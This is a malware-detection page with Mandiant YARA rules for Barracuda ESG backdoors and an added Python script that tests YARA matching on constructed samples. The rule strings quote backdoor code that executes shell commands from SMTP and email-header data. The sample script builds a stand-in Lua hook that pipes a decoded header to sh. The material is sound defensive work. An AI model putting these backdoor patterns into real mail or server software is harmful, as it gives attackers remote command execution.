Yara Rule - Hunting rule looking for strings observed in SEASPRAY samples.

Yara definition.

Author: Mandiant

Reference: https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally

```yara
// Mandiant's Barracuda ESG hunting rules as carried in the signature-base commit
// linked below. The rule headers are not reproduced here; each fragment is set off
// by a comment, and only the second fragment retains its condition.

// --- fragment 1 ---
meta:
    date = "2023-06-15"
    score = 70
    hash = "cd2813f0260d63ad5adf0446253c2172"
strings:
    $s1 = "function on_helo()"
    $s2 = "local bindex,eindex = string.find(helo,'.onion')"
    $s3 = "helosend = 'pd'..' '..helosend"
    $s4 = "os.execute(helosend)"

// --- fragment 2 ---
meta:
    date = "2023-06-15"
    score = 70
    hash = "177add288b289d43236d2dba33e65956"
strings:
    $s1 = "error -1 exit" fullword
    $s2 = "create socket error: %s(error: %d)\n" fullword
    $s3 = "connect error: %s(error: %d)\n" fullword
    // mov dword [rax], " 2>&" ; mov word [rax+4], "1\0": the redirect is built
    // from immediates, so a plain text string would not find it
    $s4 = {C7 00 20 32 3E 26 66 C7 40 04 31 00}
    $c1 = "plain_connect" fullword
    $c2 = "ssl_connect" fullword
    $c3 = "SSLShell.c" fullword
condition:
    uint32(0) == 0x464c457f and filesize < 15MB and (all of ($s*) or all of ($c*))

// --- fragment 3 ---
meta:
    date = "2023-06-15"
    hash = "e4e86c273a2b67a605f5d4686783e0cc"
    score = 70
strings:
    // the base64 modifier matches the three possible base64 alignments of the text
    $str1 = "hdr:name() == 'Content-ID'" base64
    $str2 = "hdr:body() ~= nil" base64
    $str3 = "string.match(hdr:body(),\"^[%w%+/=\\r\\n]+$\")" base64
    $str4 = "openssl aes-256-cbc" base64
    $str5 = "mod_content.lua"
    $str6 = "#!/bin/sh"

// --- fragment 4 ---
meta:
    date = "2023-06-15"
    hash = "87847445f9524671022d70f2a812728f"
    score = 70
strings:
    $str1 = "hdr:name() == 'Content-ID'"
    $str2 = "hdr:body() ~= nil"
    $str3 = "string.match(hdr:body(),\"^[%w%+/=\\r\\n]+$\")"
    $str4 = "openssl aes-256-cbc"
    $str5 = "| base64 -d| sh 2>"

// --- fragment 5 ---
meta:
    date = "2023-06-15"
    hash = "35cf6faf442d325961935f660e2ab5a0"
    score = 70
strings:
    $str1 = "string.find(attachment:filename(),'obt075') ~= nil"
    $str2 = "os.execute('cp '..tostring(tmpfile)..' /tmp/'..attachment:filename())"
    $str3 = "os.execute('rverify'..' /tmp/'..attachment:filename())"
```
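The rules above lean on a few YARA semantics that are easy to get wrong when porting them to another scanner or checking them by hand: `fullword` boundaries, the little-endian `uint32(0)` ELF magic test, what the hex pattern `$s4` actually encodes, and the `base64` modifier on the third fragment (an installer script carries the Lua module base64-encoded, so the plain strings never appear in it). The Python below is an added example, not Mandiant's or signature-base's code. It re-implements those semantics and runs them over constructed sample files built inline (a fake ELF and a fake installer script, neither of them real malware), and it goes beyond the page by showing all three base64 alignments. The third fragment's condition is not on this page, so `all of them` is assumed for it; the reading of `$s4` as two `mov`-immediate stores spelling ` 2>&1` comes straight from its bytes.

```python
"""Added example (not Mandiant's or signature-base's code): a small
re-implementation of the YARA matching semantics the rules above rely on,
run over constructed sample files so the non-obvious parts (fullword, the
hex immediates in $s4, the base64 modifier) can be checked offline."""
import base64
import re
import struct

MB = 1024 * 1024  # YARA's MB unit


def has_string(data: bytes, s: bytes, fullword: bool = False) -> bool:
    """Plain text string; `fullword` forbids an alphanumeric on either side."""
    pat = re.escape(s)
    if fullword:
        pat = rb"(?<![A-Za-z0-9])" + pat + rb"(?![A-Za-z0-9])"
    return re.search(pat, data) is not None


def has_hex(data: bytes, hexpat: str) -> bool:
    """Hex string without wildcards, written as in the rule: '{C7 00 ...}'."""
    return bytes.fromhex(hexpat.strip("{}")) in data


def base64_variants(s: bytes) -> list:
    """The three encodings YARA's `base64` modifier looks for.  s can start at
    byte 0, 1 or 2 of a three-byte base64 group, so encode k pad bytes + s and
    drop every character whose value also depends on bytes outside s."""
    variants = []
    for k in range(3):
        enc = base64.b64encode(b"\x00" * k + s)
        lead = (0, 2, 3)[k]                   # chars polluted by the pad bytes
        trail = (0, 3, 2)[(k + len(s)) % 3]   # chars polluted by what follows s
        variants.append(enc[lead:len(enc) - trail])
    return variants


def has_base64_string(data: bytes, s: bytes) -> bool:
    return any(v in data for v in base64_variants(s))


def hex_immediates(hexpat: str) -> bytes:
    """$s4 of the second fragment is two x86-64 stores of immediates:
    C7 00 imm32 (mov dword [rax], imm32) and 66 C7 40 04 imm16
    (mov word [rax+4], imm16).  The immediates are the text the binary
    assembles in memory, so a plain text string would never see it."""
    b = bytes.fromhex(hexpat.strip("{}"))
    if b[:2] != b"\xc7\x00" or b[6:10] != b"\x66\xc7\x40\x04":
        raise ValueError("not the expected mov-immediate pair")
    return b[2:6] + b[10:12]


# Strings copied from the rule fragments above.
WHIRLPOOL_S = [b"error -1 exit", b"create socket error: %s(error: %d)\n",
               b"connect error: %s(error: %d)\n"]
WHIRLPOOL_S4 = "{C7 00 20 32 3E 26 66 C7 40 04 31 00}"
WHIRLPOOL_C = [b"plain_connect", b"ssl_connect", b"SSLShell.c"]
SKIPJACK_B64 = [b"hdr:name() == 'Content-ID'", b"hdr:body() ~= nil",
                b'string.match(hdr:body(),"^[%w%+/=\\r\\n]+$")',
                b"openssl aes-256-cbc"]
SKIPJACK_PLAIN = [b"mod_content.lua", b"#!/bin/sh"]


def whirlpool_rule(data: bytes) -> bool:
    """uint32(0) == 0x464c457f and filesize < 15MB and (all of ($s*) or all of ($c*))"""
    if len(data) < 4 or struct.unpack("<I", data[:4])[0] != 0x464C457F:
        return False                      # not an ELF file
    if len(data) >= 15 * MB:
        return False
    all_s = (all(has_string(data, s, fullword=True) for s in WHIRLPOOL_S)
             and has_hex(data, WHIRLPOOL_S4))
    all_c = all(has_string(data, c, fullword=True) for c in WHIRLPOOL_C)
    return all_s or all_c


def skipjack_installer_rule(data: bytes) -> bool:
    """$str1-$str4 carry the base64 modifier, $str5-$str6 are plain.  The page
    does not show this fragment's condition; 'all of them' is assumed here."""
    return (all(has_base64_string(data, s) for s in SKIPJACK_B64)
            and all(has_string(data, s) for s in SKIPJACK_PLAIN))


# Constructed samples (not real malware): just enough bytes to exercise the rules.
def make_fake_elf(strings, hexpat: str = "") -> bytes:
    body = b"\x7fELF\x02\x01\x01" + b"\x00" * 9        # ELF magic + ident padding
    body += b"\x00" + b"\x00".join(strings) + b"\x00"  # NUL-terminated, so fullword holds
    if hexpat:
        body += bytes.fromhex(hexpat.strip("{}"))
    return body


LUA_HOOK = b"""-- constructed stand-in for a mod_content.lua hook
if hdr:name() == 'Content-ID' and hdr:body() ~= nil then
  if string.match(hdr:body(),"^[%w%+/=\\r\\n]+$") then
    os.execute("echo "..hdr:body().." | base64 -d | openssl aes-256-cbc -d | sh")
  end
end
"""


def make_fake_installer(prefix_len: int) -> bytes:
    """Shell script carrying the Lua hook base64-encoded; prefix_len filler
    bytes shift which of the three base64 alignments the hook lands on."""
    blob = base64.b64encode(b"-" * prefix_len + LUA_HOOK)
    return b"#!/bin/sh\necho " + blob + b" | base64 -d > mod_content.lua\n"


if __name__ == "__main__":
    print(hex_immediates(WHIRLPOOL_S4))                       # b' 2>&1\x00'
    print(whirlpool_rule(make_fake_elf(WHIRLPOOL_S, WHIRLPOOL_S4)))
    for n in range(3):
        inst = make_fake_installer(n)
        print(n, SKIPJACK_B64[0] in inst, skipjack_installer_rule(inst))
```

Running it shows the plain `hdr:name() == 'Content-ID'` is absent from every constructed installer while the base64-modified check fires at all three alignments, which is exactly why the third fragment needs the modifier and the fourth fragment (which looks at the decoded module) does not. The fake ELF also shows the two independent paths through the second fragment's condition: the `$s*` set only matches when the ` 2>&1` immediate stores are present, while the `$c*` set matches on the three function and file names alone.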


[https://github.com/Neo23x0/signature-base/commit/60ecfbe9f1bbab86e9222da5729ffac7b2cd7c7c](https://github.com/Neo23x0/signature-base/commit/60ecfbe9f1bbab86e9222da5729ffac7b2cd7c7c)